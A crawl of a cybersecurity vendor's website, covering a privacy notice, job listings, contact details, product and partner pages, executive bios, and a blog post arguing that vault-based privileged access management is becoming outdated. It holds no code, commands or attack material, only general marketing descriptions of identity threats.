3.1. We will not transfer Personal Data originating in the EU, UK, and/or Switzerland to third parties unless such third parties have entered into an agreement in writing with us requiring them to provide at least the same level of protection to the Personal Data as required by the Principles of the EU-U.S. DPF (and the UK Extension to the EU-U.S. DPF) and the Swiss-U.S. DPF. We transfer Personal Data to processors, service providers, vendors, contractors, partners and agents (collectively "Processors") who need the information in order to provide services to or perform activities on Our behalf. We are responsible for such onward transfers to third parties pursuant to the EU-U.S. DPF (and the UK Extension to the EU-U.S. DPF) and the Swiss-U.S. DPF. The abovementioned Processors and the description of the services that they provide and/or the activities that they perform are set out below:

Processor's purpose:
- On-demand cloud computing platforms, including digital user experience cloud-based platform and cloud-based customer support services.
- User log-in tools.
- Customer communication platform for transactional and email provider.
- CRM platform.
- Support platform.

3.2. To the extent necessary, with regulators, courts or competent authorities, to comply with applicable laws, regulations and rules (including, without limitation, federal, state or local laws), and requests of law enforcement, regulatory and other public or governmental agencies, or if required to do so by court order (including to meet national security or law enforcement requirement);

3.3. If, in the future, we sell or transfer, or we consider selling or transferring, some or all of our business, shares or assets to a third party, we will disclose your Personal Data to such third party (whether actual or potential) in connection with the foregoing events;

3.4. In the event that we are acquired by, or merged with, a third party entity, or in the event of bankruptcy or a comparable event, we reserve the right to transfer, disclose or assign your Personal Data in connection with the foregoing events, including, in connection with, or during negotiations of, any merger, sale of company assets, consolidation or restructuring, financing, or acquisition of all or a portion of our business by or to another company; and/or

3.5. Where you have provided your consent to us sharing or transferring your Personal Data.

4. DATA SUBJECT RIGHTS.

You have the right to access Personal Data about you, and in some cases you are also allowed to correct, amend, or delete that Personal Data where it is inaccurate, or has been processed in violation of the DPF principles. In addition, you have the choice to limit the use and disclosure of your Personal Data. If you believe that We are Processing your Personal Data within the scope of Our DPF program, you can submit your request to: privacy@silverfort.com. Please be aware that in specific situations where fulfilling access or other requests might impose a disproportionate burden or expense, or potentially infringe upon the rights of others, we may be required to carefully review and, if permissible under applicable law, respectfully decline your request.

5. INDEPENDENT RECOURSE MECHANISM. ARBITRATION.

5.1. In compliance with the EU-U.S. DPF (and the UK Extension to the EU-U.S. DPF) and the Swiss-U.S. DPF, Silverfort, Inc. commits to resolve DPF Principles-related complaints about our collection and use of your personal information. EU, UK and Swiss individuals with inquiries or complaints regarding our handling of personal data received in reliance on the EU-U.S. DPF (and the UK Extension to the EU-U.S. DPF) and the Swiss-U.S. DPF should first contact Silverfort, Inc. at privacy@silverfort.com or by postal mail sent to: Silverfort, Inc., Attn: DPF Inquiry, 43 Westland Avenue, Boston, MA 02115, USA.

Silverfort has further committed to refer unresolved privacy complaints under the EU-U.S. DPF (and the UK Extension to the EU-U.S. DPF) and the Swiss-U.S. DPF to JAMS, a non-profit alternative dispute resolution provider located in the United States, to assist with the complaint resolution process. If you do not receive timely acknowledgment of your complaint, or if your complaint is not satisfactorily addressed, please visit https://www.jamsadr.com/dpf-dispute-resolution for more information and to file a complaint. The services of JAMS are provided at no cost to you.

5.2. Under certain conditions, more fully described on the DPF website (available here), you may also be able to invoke binding arbitration to determine whether a participating organization has violated its obligations under the DPF principles as to that individual and whether any such violation remains fully or partially unremedied (“residual claims”) after you approached us and you used the independent recourse mechanism. The International Centre for Dispute Resolution-American Arbitration Association (“ICDR-AAA”) was selected by the U.S. Department of Commerce to administer arbitrations pursuant to and manage the arbitral fund. Please visit ICDR-AAA’s website for more information.

6. U.S. FEDERAL TRADE COMMISSION ENFORCEMENT.

Silverfort is subject to the investigatory and enforcement powers of the Federal Trade Commission ("FTC") to ensure compliance with the EU-U.S. DPF (and the UK Extension to the EU-U.S. DPF) and the Swiss-U.S. DPF outlined in this DPF Notice.

---
- Published: 2022-03-28
- Modified: 2025-03-03
- URL: https://www.silverfort.com/careers/

Careers with Silverfort

Join our team. We’re always looking for the best talent to join our award-winning team. Discover what it’s like to work at Silverfort and browse open job opportunities here.

#1 BEST start-up to work for in Israel for the third year in a row, according to Dun & Bradstreet 2022, 2023 & 2024.

Perks and benefits. Always for your benefit. We offer a huge range of perks and benefits to our people, and we’re always looking for new ways to make working at Silverfort special. Some benefits may vary by country.
- Silverfort Care & Wellness: Employees’ wellbeing matters, which is why we reimburse up to $100 USD monthly for personal care and wellness.
- Stock Options Plan: All permanent employees receive stock options since they are fundamental to our success.
- Quarterly Recharge Days: In addition to your annual leave, we have quarterly recharge days so our entire team can enjoy a long weekend.
- Volunteering initiatives: We believe in giving back, and offer paid leave to volunteer for a cause or charity of your choice.
- Company events: We host the best parties, QBRs, SKOs and more. Check out our photos to see some of the fun we’ve had together over the years.
- Personal Development: Learn new skills and tools with our quarterly workshops and personalized development programs.

Open Positions. If you can’t find the right role below, send your resume to jobs@silverfort.com and we’ll be in touch if a future opening looks like a good fit for you.

Channel Account Manager - South East United States (Sales)

Description: Silverfort is a cyber-security company that develops a revolutionary identity protection platform. Using patented technology, our product enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. In addition, we use advanced behavior analytics to apply adaptive authentication policies and prevent cyber-attacks in real time. Our mission is to provide industry-leading unified identity protection solutions for hybrid and multi-cloud environments.
We develop cutting-edge cybersecurity technology that solves urgent customer needs today and is also a game changer for years to come. Silverfort’s team includes exceptional researchers, engineers, and technology experts who successfully tackle some of the most complex challenges in cyber-security. Silverfort has happy customers worldwide, strong market validation (including several industry awards), strategic partnerships with the largest security vendors in the world, and significant funding from leading VCs.

The Channel Account Manager will generate new business through building a reseller, referral partner, and distributor network. The Channel Account Manager will be tasked with executing on all aspects of the business relationship with each partner including recruiting, qualifying, onboarding, training, pipeline generation and reporting, and win/loss reporting.

Responsibilities:
- Work closely with the Account Executives in the South East area to identify the focus partners
- Build the Go To Market business plans with the identified focus partners
- Align the sales organization through targeted demand generation and alignment activities
- Drive resources to provide enablement activities at both the Sales and SE levels
- Provide executive alignment with partner stakeholders
- Align yourself internally with Enterprise, Commercial Sales and Sales Leadership to drive toward a common goal
- Accurately forecast partner opportunities in conjunction with the direct sales teams
- Build marketing plans and manage a budget for the region
- Coordinate and collaborate with cross-functional teams (including SE organization, product marketing, sales, marketing, operations and legal) to deliver a world class experience for the partner
- Hold the partners and the stakeholders accountable to agreed-upon goals
- Proactively maintain ongoing knowledge of industry, global markets, existing and target channel partner accounts & competitive landscape
- Possess an in-depth knowledge of each strategic partner’s business and what drives their success

Requirements:
- At least 5 years of proven success in Channel or Technology Sales
- Experience in Security and/or Identity technologies
- Skilled at strategizing with large partners
- Proven track record of achieving and exceeding sales quota targets
- Strategic mindset to drive the partner lifecycle, including recruitment, enablement, pipeline, revenue, marketing
- Proven ability to communicate with partners at all levels within an organization
- Demonstrates thorough preparation for all partner meetings and activities
- Proven success with sales ability and demonstrated knowledge of sales process
- Excellent presentation skills
- Willingness to go above and beyond the job description to be successful
- BA/BS degree - an advantage
- Team oriented
- Open to travel - 40%
- We prefer candidates in the Atlanta, Florida, or Washington DC area

Regional Sales Manager - Nordics (Stockholm, Sweden)

Description: Silverfort is a cyber-security startup that develops a revolutionary identity protection platform. Our mission is to provide industry-leading unified identity protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors. We are looking for a hungry, hunter-at-heart, Regional Sales Manager superstar to join our rapidly growing company and help boost our client-base across the Nordics Region.
Responsibilities:
- Execute on the entire sales cycle end-to-end: create and qualify leads and pipeline, manage high-quality C-level customer meetings, oversee POCs, perform key account management, negotiate and close
- Establish and maintain direct relationships with C-level executives in target end-customer accounts as well as in key channel partners
- Develop and execute comprehensive business plans for strategic accounts, become a trusted advisor for prospects, evangelize value propositions on an expert level
- Capture, reflect and maintain sales forecast diligently in SFDC
- Collaborate with presale, product, marketing and customer success teams to maximize overall customer satisfaction
- Meet/exceed sales quota

Requirements:
- 6+ years of B2B sales experience overall, of which 3+ years in direct sales of cybersecurity or IAM software solutions to medium and large enterprises
- Proven track record of consistently meeting/overachieving sales quotas
- Experience in working closely and collaboratively with channel partners
- Pro-active, hungry, self-driven individual, with a whatever-it-takes attitude
- Passionate about innovative technology and about winning customers’ hearts and minds
- Outstanding communication skills, comfortable presenting to C-level executives and technical leads alike
- Experience in selling technical products of startup-stage vendors - a significant advantage

Regional Sales Manager - DACH (Munich, Germany)

Description: Silverfort is a cyber-security startup that develops a revolutionary identity protection platform. Our mission is to provide industry-leading unified identity protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers.
Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors. We are looking for a hungry, hunter-at-heart, Sales Manager superstar to join our rapidly growing company and help boost our client-base across the DACH Region.

Responsibilities:
- Execute on the entire sales cycle end-to-end: create and qualify leads and pipeline, independently present and demo to end customers, oversee POCs, negotiate and close
- Establish and maintain direct relationships with relevant decision-makers in target end-customer accounts
- Establish and maintain direct relationships with key channel partners in support of full channel partner enablement
- Capture, reflect and maintain sales forecast diligently and accurately in SFDC
- Collaborate with presale, product, marketing, and customer success teams to maximize overall customer satisfaction
- Meet/exceed sales quota

Requirements:
- 5+ years of experience selling software to end customers, with two-tier channels in cybersecurity vendors or resellers
- Experience selling to customers in the DACH Region
- Coachable and open to constructive feedback
- Proven track record of consistently meeting/overachieving sales quotas
- Pro-active, hungry, self-driven with a whatever-it-takes attitude
- Passionate about innovative technology
- Passionate about sales and invests in continuous learning and improving
- Outstanding communication skills, comfortable with both presenting to C-level executives and demoing to technical stakeholders
- Experience in selling technical products of startup-stage vendors - an advantage
- High level of English and German - a must

Renewals Manager - EMEA (Munich, Germany)

Description: Silverfort is a cyber-security company that has developed a revolutionary identity protection platform.
Our mission is to provide industry-leading Unified Identity Protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors.

As a Renewal Manager, you will be responsible for overseeing our customer account contracts for Silverfort’s EMEA Territories. This includes communicating directly with customers, resellers, distributors, and internal colleagues to ensure the timely and accurate execution of customer renewals as well as helping our customers expand their Silverfort footprint. As part of our industry-leading organization, you will also be responsible for managing account-related tasks rooted in maximizing customer value and investment.
Responsibilities
- Negotiate value-driven renewals and contract changes while ensuring a world-class customer experience
- Utilize business development skills to execute product expansion opportunities in collaboration with Customer Success and Sales teams
- Work collaboratively with customers, resellers, and internal stakeholders to grow accounts and drive incremental opportunities
- Establish rapport and solid working relationships with your customers
- Lead internal forecasting discussions and pipeline reviews
- Contribute to the success of the company by providing feedback and influencing new processes and playbooks

Requirements
- 3-4 years of Renewal experience in the Tech Industry
- Possess sales or negotiation experience
- Show clear communication skills with the ability to lead a conversation effectively
- Must be passionate about creating a great customer experience
- Possess prioritization and organizational skills with attention to detail
- Thrive in a dynamic and passionate environment
- Invest in relationships with customers and colleagues
- Seek to understand multiple perspectives in a situation
- Contribute to a positive team environment
- Working knowledge of Salesforce, CPQ, Microsoft Suite (PPTX, Word, Excel)
- High level of spoken and written English and German - a must
- Ability to work on Fridays

Renewals Manager - EMEA, Tel Aviv, Israel

Description
Silverfort is a cyber-security company that has developed a revolutionary identity protection platform. Our mission is to provide industry-leading Unified Identity Protection solutions for hybrid and multi-cloud environments. Using patented technology, Silverfort’s platform enables strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers.
Silverfort has been widely recognized as an industry innovator, being named “Best of MFA award” from Expert Insights, Microsoft Security 20/20 partner award, Homeland Security Award for Best Identity Access Management platform for its agentless secure authentication and zero trust platform by Astors.

As a Renewal Manager, you will be responsible for overseeing our customer account contracts for Silverfort’s EMEA Territories. This includes communicating directly with customers, resellers, distributors, and internal colleagues to ensure the timely and accurate execution of customer renewals as well as helping our customers expand their Silverfort footprint. As part of our industry-leading organization, you will also be responsible for managing account-related tasks rooted in maximizing customer value and investment.

Responsibilities
- Negotiate value-driven renewals and contract changes while ensuring a world-class customer experience
- Utilize business development skills to execute product expansion opportunities in collaboration with Customer Success and Sales teams
- Work collaboratively with customers, resellers, and internal stakeholders to grow accounts and drive incremental opportunities
- Establish rapport and solid working relationships with your customers
- Lead internal forecasting discussions and pipeline reviews
- Contribute to the success of the company by providing feedback and influencing new processes and playbooks

Requirements
- 3-4 years of Renewal experience in the Tech Industry
- Possess sales or negotiation experience
- Show clear communication skills with the ability to lead a conversation effectively
- Must be passionate about creating a great customer experience
- Possess prioritization and organizational skills with attention to detail
- Thrive in a dynamic and passionate environment
- Invest in relationships with customers and colleagues
- Seek to understand multiple perspectives in a situation
- Contribute to a positive team environment
- Working knowledge of Salesforce, CPQ, Microsoft Suite (PPTX, Word, Excel)
- High level of spoken and written English and German - a must
- Ability to work on Fridays

### Customer Success & Support

Commercial Customer Success Manager, United States

Description
Silverfort is a cyber security startup that develops a revolutionary identity protection platform. Our mission is to provide industry leading unified identity protection solutions for hybrid and multicloud environments. Using patented technology, Silverfort’s...

---

- Published: 2022-03-24
- Modified: 2025-08-26
- URL: https://www.silverfort.com/contact/

### Contact us

Let's connect. We're here to help.

Talk to sales: Looking for a complete end-to-end identity security solution? You’ve come to the right place. Get a demo for a complete guided tour of our platform.

Become a partner: Our partner network includes leading value-added distributors and resellers, advisory consultants, global system integrators, and tech partners. Contact us to learn more.

Get support: Already a customer? Raise a support ticket in our Customer Support Portal. If you do not have access to the portal, email support@silverfort.com.

Locations
- United States (HQ): 5525 Granite Parkway, Plano, Texas 75024, United States, (+1) 202.688.3098
- Australia: Sydney, Level 16, 175 Pitt St, Sydney, NSW 2000; Melbourne, Level 4–5, 447 Collins Street, Melbourne VIC 3000
- Germany: Theodor-Stern-Kai 1, 60596 Frankfurt am Main, Germany
- Israel: 2 Leonardo da Vinci St., 40th Floor, Landmark TLV Tower, Tel Aviv-Yafo, 6473309 Israel
- Japan: Gran Tokyo South Tower 9th fl, 1-9-2 Marunouchi, Chiyoda-ku, Tokyo 100-6611, jpinfo@silverfort.com
- Singapore: 176 Orchard Road, The Centrepoint, #05-05, Singapore 238843

Work with us: We’re always looking for the best talent to join our award-winning team. Discover what it’s like to work at Silverfort and browse open job opportunities here.
---

- Published: 2022-03-18
- Modified: 2025-08-21
- URL: https://www.silverfort.com/use-cases/securing-service-accounts/

Discover, monitor and protect service accounts (M2M access) with fully automated visibility, risk analysis and adaptive Zero Trust policies, without requiring password rotation.

- Automated Discovery & Monitoring: Gain automatic and comprehensive visibility into all your service accounts and non-human identities, including the ones you’re not aware of, as well as real-time insights into their activity and risk level.
- Proactive Threat Prevention: Place a virtual perimeter around your service accounts with ready-to-use Zero Trust access policies tailored to each account’s behavior to prevent threat actors from using them in lateral movement attacks.
- No Password Rotation: Protect your service accounts completely and at scale without the operational concerns of unknown dependencies and the breaking of mission-critical processes that comes from password rotation.

### Discover all your service accounts

- Automated AI-based discovery of all accounts with machine-like behavior, as well as typical service account attributes and naming conventions.
- Complete visibility into all service accounts and real-time insights into their sources, destinations, authentication protocols, and activity volume.
- Discover accounts that are being shared by both human users and services.

### Monitor service account activity and risk

- Monitor service account activity continuously in real time.
- Track the usage patterns, access requests and behavior of each service account, including high-level permissions, broad use, and repetitive behavior.
- High-precision anomaly detection which alerts on any deviation from the service account’s standard behavior.
### Analyze all service account activity

- Assess the risk of every authentication attempt and detect any suspicious behaviors or anomalies.
- Utilize enriched contextual data and risk scoring for each service account.
- Provide SOC teams with logs and actionable insights into overall service account activity.

### Evaluate service account policies

- Silverfort automatically suggests a tailor-made policy for each service account based on its behavioral pattern.
- Build out custom policies to fine-tune and adjust protection as needed.
- Customers can start with alerting mode and gradually advance to full protection.

“Service accounts are a security nightmare because you can’t put MFA on them. Silverfort was able to protect what no one else can, including our service accounts. Of the security tools that we use, Silverfort has a very high return on investment.”
Tom Parker | VP of IT & CISO

Customer Challenge: Kayak struggled to find a solution that could extend identity security controls over their entire environment, particularly their critical applications that use LDAP and their service accounts.

Silverfort Solution: Silverfort enabled Kayak to put real-time protection on service accounts by enforcing policies that block any access that deviated from normal behavior. Because of this, even if attackers could compromise the credentials of their service accounts, they would not be able to use them for malicious access.

---

- Published: 2022-03-18
- Modified: 2025-08-18
- URL: https://www.silverfort.com/request-a-demo/

Secure every identity. Stop identity threats—inline. We found a way. From legacy to cloud, discover and protect every identity. See how Silverfort:

- Finds and protects service accounts & NHIs
- Contains attackers, reduces IR times & cost
- Secures your Active Directory
- Helps you securely innovate and adopt AI

“We did a demo and POC and our jaws dropped. We wondered where this has been all our lives. We knew we needed Silverfort.”
Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson

“Silverfort was able to protect what no one else can. There were no solutions that we looked at that were as comprehensive.”
Tom Parker, VP of IT & CISO | Kayak

“Silverfort’s innovative solution simplifies this process without system modifications, saving time and money.”
William Woo, Group CIO | Singtel

Rated 4.8 on Gartner Peer Insights

### Recognized by the industry

- Fast Company’s Most Innovative Companies 2025
- Fortune Top 50 Cybersecurity Companies 2025
- 2024 Microsoft Partner of the Year

### Why choose the Silverfort Identity Security Platform

- 10B: Authentications analyzed and protected every day.
- 34K: Real identity exposures & threats detected on average per customer.
- 17x: Faster deployment compared to traditional solutions on average.
Convinced yet? Let's chat.

---

- Published: 2022-03-15
- Modified: 2025-07-11
- URL: https://www.silverfort.com/company/

### About Us

Taking identity security where it has never gone before. Silverfort secures every dimension of identity. We break down the silos of identity infrastructure and point solutions to eliminate security gaps and blind spots once and for all. The result? Identity security without limits—that doesn't slow down the business.

“Identity has become the weakest link in enterprise security, and solving it requires a new approach – a unified, end-to-end layer of security that covers all the silos and blind spots of the identity infrastructure. Thanks to the trust of organizations around the world, we found a way to solve it.”
Hed Kovetz, CEO & Co-Founder | Silverfort

### Our story

What if you could make identity security work for you? We found a way. When it comes to cybersecurity, identity isn’t just a feature—it’s the most critical element to your success. For too long, enterprises have settled for isolated identity and access management (IAM) solutions and security patchworks that leave them exposed.

Founded in 2016, Silverfort set out to take identity security where it has never gone before. With identity security as our sole focus and mission, we found a way to protect every identity, whether it’s in the cloud or on-prem, human or machine. Fueled by a belief that identity professionals deserve better, Silverfort breaks down the silos of identity security, eliminating the gaps and blind spots that make them vulnerable. Going far beyond any other solution, the Silverfort Identity Security Platform protects all identities, all resources and all environments, all the time. Silverfort is the only platform that truly goes everywhere to deliver unparalleled protection, context and visibility—all in a single platform. This is identity security done right.
### Recognized by the industry

- Fast Company’s Most Innovative Companies 2025
- Ranked 4.8 on Gartner Peer Insights
- #1 best start-up to work for in Israel
- 2024 Microsoft Partner of the Year
- Great Place to Work certified 2024-2025

### Team Silverfort

Meet the pioneers transforming identity security.

- Hed Kovetz (CEO, Co-Founder): Hed serves as Silverfort’s CEO and is one of the company’s Co-Founders. He brings a unique technical and leadership background, including product leadership roles at Verint. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL.B. from Tel Aviv University.
- Yaron Kassner (CTO, Co-Founder): Yaron is the co-founder and Chief Technology Officer at Silverfort. Before co-founding Silverfort, Yaron did machine learning projects for Microsoft as an intern, and later for Cisco as a consultant. Prior to that, Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team and received a prestigious excellence award. Yaron holds a B.Sc. in Applied Mathematics, Summa Cum Laude, from Bar-Ilan University, and a Ph.D. in Computer Science from the Technion – Israel Institute of Technology.
- Matan Fattal (Co-Founder): Matan is one of Silverfort’s Co-Founders. Before co-founding Silverfort, he was part of the innovation R&D team at Intucell (acquired by Cisco), where he built real-time, large-scale products. Prior to that, Matan worked as a Software Engineer at Intel. Matan also served at the 8200 elite cyber unit of the Israel Defense Forces as a cybersecurity and big data researcher and received the unit’s excellence award. Matan holds a B.Sc. and completed his studies for an M.Sc. in Mathematics at Bar-Ilan University.
- Revital Aronis (SVP Product Management): Revital oversees the continual evolution of Silverfort’s Identity Security platform. Starting her career at Israel’s elite 8200 Unit, and previously at Illusive Networks, her 15 years’ experience will help the company continually augment the platform to help customers address identity security risks using innovative technology.
- Tarah Cammett (CMO): Tarah is responsible for marketing growth, demand generation, brand and industry awareness as Chief Marketing Officer. For the past 22 years she has held key leadership positions in enterprise software and cyber security corporations and most recently was awarded one of the Top 25 Female Leaders in Cybersecurity. Prior to Silverfort, Tarah held senior marketing leadership positions at Immersive Labs, VoltDB, Carbon Black and Compuware. She holds a Bachelor of Science degree in human services and psychology from Lesley University.
- Liat Gavrieli Shwartz (SVP HR): Liat leads Silverfort’s Human Resources. Liat brings many years of experience in HR and global talent recruitment for dynamic hi-tech companies. Prior to joining Silverfort, Liat was the Director of HR at Fyber. She led the HR team from their early stages as a start-up to a public company. Liat holds a BA in Behavioral Science, Rectors’ Honors Graduate, and an MA in Organizational Consulting from Bar-Ilan University.
- Howard Greenfield (President & CRO): As President and CRO at Silverfort, Howard leads Silverfort's GTM strategy and execution and oversees sales and marketing. Before joining Silverfort in June 2025, Howard was an Operating Partner at venture capital firm Canaan. Prior to that, he was CRO at Centrify, a Privileged Access Management (PAM) provider now known as Delinea, where he led the sales, marketing, partner and customer success teams.
Earlier, Greenfield was the CRO at SailPoint, one of the world’s leading identity companies, where he was instrumental in rapidly growing ARR and positioning the company for a successful IPO in 2017.
- Ben Livne (SVP R&D): As VP of R&D, Ben leads Silverfort’s engineering innovation and development efforts. He brings more than two decades of extensive experience in various engineering roles, with a deep technical background and leadership in cutting-edge technology companies. Prior to that, Ben served at the MAMRAM elite technology unit of the Israel Defense Forces as a team leader and architect, and received the unit’s excellence award. Ben holds a B.Sc. in Computer Science from the College of Management, Academic Studies.
- Irena Meadan (CFO): Irena is a finance and business professional with extensive and diversified experience in economics, corporate finance, risk and business management in both international organizations and start-up companies. Prior to joining Silverfort, Irena held various finance, consulting and business development management roles at Allot Communications, Hedgewiz, Financial Immunities, AIG and Bank of Israel, leading international teams to excellence and success. Irena holds an M.A. degree in Economics and Finance from Hebrew University, Jerusalem.
- Ron Rasin (CSO): As Chief Strategy Officer, Ron leads Silverfort’s strategic alliances with technology partners, as well as our growth operations and business strategy. He brings over a decade of hands-on product management experience and cyber security expertise. Prior to joining Silverfort, Ron was the Director of Product Management at Claroty, and held product management roles at Wix and NCR. Before that, Ron served as a Team Leader at the 8200 elite cyber unit of the Israel Defense Forces. Ron holds a B.A. in Economics from Tel Aviv University.
- Michelle Wideman (CCO): Michelle oversees Silverfort’s Customer Success and Support teams and is responsible for the customer experience, driving customer growth and retention. In this role, she works with the cross-functional teams to optimize the customer journey, ensuring customers realize the full value of the Silverfort solution. A people-first leader, she brings over twenty years of experience in Partnerships, Professional Services, Sales, Success, and Support. Prior to joining Silverfort in February 2023, she held executive leadership positions at Onna and Dell Boomi. Michelle has a Bachelor’s in Broadcast Communications & Journalism from Elon University.

### Our investors

Silverfort has raised a total of $222m. Read about our Series D.

“Silverfort is one of the rare companies that has successfully envisioned how a large market will need to transform to solve a tough problem – in this case, identity security.”
Mike Gregoire, Founding Partner, Brighton Park Capital, Former CEO of CA Technologies & Taleo

---

- Published: 2022-03-15
- Modified: 2025-07-30
- URL: https://www.silverfort.com/partners/

### Partner with Silverfort

Partnerships are key to our continued success and growth. Our partner network includes leading value-added distributors and resellers, advisory consultants, global system integrators, technology partners and more. Discover our full partner ecosystem.

Identity Security Alliance: We’re bringing security and identity leaders together to help businesses take their identity security where it has never gone before.

Channel partners: By partnering with Silverfort, you can offer your customers every aspect of identity security, from universal MFA to lateral movement protection and rapid cyber insurance compliance.

Cyber insurance partners: Help your insureds check off all MFA requirements, detect and protect their service accounts, and stop identity threats.
Technology partners (Identity Security Alliance): Our Identity Security Alliance brings together next-gen technology partners to develop and deliver comprehensive, end-to-end security integrations with Silverfort that can dynamically adapt to evolving identity infrastructures.

### Channel partners

By partnering with Silverfort, you can offer your customers every aspect of identity security:

- Complement your existing IAM and MFA offerings with extended MFA coverage for all resources, including those that couldn’t be protected before.
- Enhance your XDR offering with proactive protection against lateral movement and ransomware propagation attacks.
- Enable compliance with Cyber Insurance MFA requirements and other regulatory frameworks.

### Cyber Insurance Partner Ecosystem

As a cyber insurance partner, your insureds will have access to our special cyber insurance bundle and discounted pricing.

- Help insureds check off all their MFA requirements: email, remote network, and internal and external admin access.
- Give your insureds the ability to detect and protect service accounts.
- Stop identity threats such as account takeover, lateral movement and the spread of ransomware.

---

- Published: 2022-03-14
- Modified: 2025-08-21
- URL: https://www.silverfort.com/platform/

### The Silverfort Identity Security Platform

Secure every dimension of identity. Leave no one behind. Protect workforce users, privileged users, third parties, AI Agents and non-human identities (NHIs).

Silverfort connects to your entire IAM infrastructure and secures it from within. Our platform uses Runtime Access Protection (RAP) technology to seamlessly integrate with your entire IAM infrastructure, delivering end-to-end visibility and inline protection to every identity, everywhere. No more user disruptions. No more system modifications.
- All identities: Leave no one behind. Protect workforce users, privileged users, third parties and non-human identities (NHIs).
- All environments: Apply security controls to every corner of your infrastructure: on-prem, OT, hybrid, cloud and multi-cloud.
- All resources: Extend protection to every resource, from legacy systems and command-line tools to modern cloud workloads and SaaS apps.

### The Silverfort difference: Runtime Access Protection (RAP)

1. User requests access from IAM infrastructure
2. IAM infrastructure forwards request to Silverfort using RAP technology
3. Silverfort analyzes risk & triggers inline security controls if needed
4. Silverfort returns security verdict to IAM infrastructure
5. IAM infrastructure grants or denies access

### Explore the Silverfort Identity Security Platform

Finally, the identity security platform you deserve. End-to-end visibility and protection when it matters most.

- Discover: Discover every identity across every environment and monitor all access activity in one place for intelligent decision making.
- Analyze: Analyze all identities and access attempts continuously to uncover security exposures and detect threats in real time.
- Enforce: Enforce security controls to stop lateral movement, ransomware propagation and other identity threats in real time.

“It’s amazing how simple it was to deploy Silverfort—it only took a few hours to get up and running. As a result of Silverfort, our admin users are protected with strong MFA controls, and we closely monitor any malicious use of authentication protocols.”
Lee Humphreys, Infrastructure Security Architect | London Borough of Waltham Forest

“We highly recommend Silverfort, as the identity insights you get, the flexibility for policy enforcement, and the granularity have been critical for our success in protecting our environments.”
Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson

“Since deploying Silverfort, we have applied security controls and MFA protection to legacy applications, a vital step in improving our environments against ransomware threats.”
Kurt Gielen, IT Manager | ZOL

“Silverfort’s authentication firewall has significantly strengthened our security posture. We’ve been able to effectively mitigate identity threats by ensuring only authenticated users have access to our resources.”
Head of IAM, Leading Retail Organization

Identity security that works for you. Go beyond the limits of traditional identity security. Set up a demo to experience unified protection that stops identity-based attacks.

---

## Posts

- Published: 2025-08-25
- Modified: 2025-08-21
- URL: https://www.silverfort.com/blog/the-future-of-privileged-access-is-vault-free/

The cybersecurity world was jolted by the recent announcement that Palo Alto Networks will acquire CyberArk in a landmark deal valued at approximately $25 billion. Beyond the financial scale of the transaction, this acquisition marks a shift in how the industry views identity security. The recent acquisition validates what we’ve been emphasizing already: identity is both the first and last line of defense, and it demands its own dedicated security layer. Just as we've seen in other domains like endpoint and cloud security, protecting identities requires an end-to-end platform—one that offers unified visibility, intelligent insights, and inline protection.
CyberArk, rooted in Privileged Access Management (PAM), has expanded its identity capabilities in response to market needs. But this acquisition surfaces a more critical and timely question: What is the future of PAM?

We believe we’re witnessing the beginning of a transformation. A future where securing privileged access will no longer revolve around a vault. In fact, vault-based approaches will no longer be the primary method of enforcing privileged access security.

This shift parallels transformations we’ve already seen in other areas of cybersecurity:

- Cloud security has gone agentless, replacing intrusive deployments with lightweight, API-based visibility.
- Multi-Factor Authentication (MFA) no longer requires code changes or proxies as it did in the past. Today it is enforced by the identity provider or an extension to the identity provider.
- Identity protection platforms now enforce policies in real time without injecting keys or passwords, reducing the attack surface.
- Network security moved away from physical firewalls and VPNs to Zero Trust Network Access (ZTNA), which grants access dynamically based on identity, context, and posture.

In each of these cases, the core idea was the same: move away from securing secrets or infrastructure, and instead focus on securing the access itself. PAM is now undergoing a similar evolution.

### The problem with vault-based PAM

Vaults were introduced as a way to protect the credentials used by privileged accounts—admin usernames and passwords for servers, databases, switches, and more. The premise was sound: don’t let users know or reuse powerful passwords. Instead, let them retrieve credentials from a secure vault when needed, and rotate those passwords after use.

But in practice, vault-based PAM creates several problems:

- It secures the credential, not the access. Once a user retrieves the credential, the vault’s protections end. That password can be stolen from memory, logged by malware, misused by insiders, or intercepted in a man-in-the-middle attack. The access itself isn’t protected—just the storage of the password.
- It’s operationally complex. Vault-based PAM introduces major friction into workflows. Changing how users log into systems—redirecting them through a proxy, forcing them to check out passwords, re-authenticating constantly—often requires training, workarounds, or exceptions. On the NHI front, rotating service account credentials typically requires multiple approvals and careful work to avoid breaking changes. This change in behavior complicates adoption and makes PAM deployments time-consuming and expensive. Many organizations take years to roll out PAM at scale, especially in hybrid environments where legacy systems, service accounts, and third-party access all require separate configurations.
- It’s not breach-proof. Vaults themselves are high-value targets. Attackers know that compromising a vault can yield credentials for the most sensitive systems in the organization. We’ve seen real-world breaches that prove this. In a high-profile 2022 breach, the attacker reportedly gained access to the company’s privileged access vault by harvesting credentials and tricking an employee into approving MFA requests. Once inside, the attacker had access to admin tools, infrastructure, and sensitive data. In other incidents, attackers have exploited vault misconfigurations, API tokens, or integration weaknesses to escalate their access. The idea that vaults are unbreachable is no longer tenable.
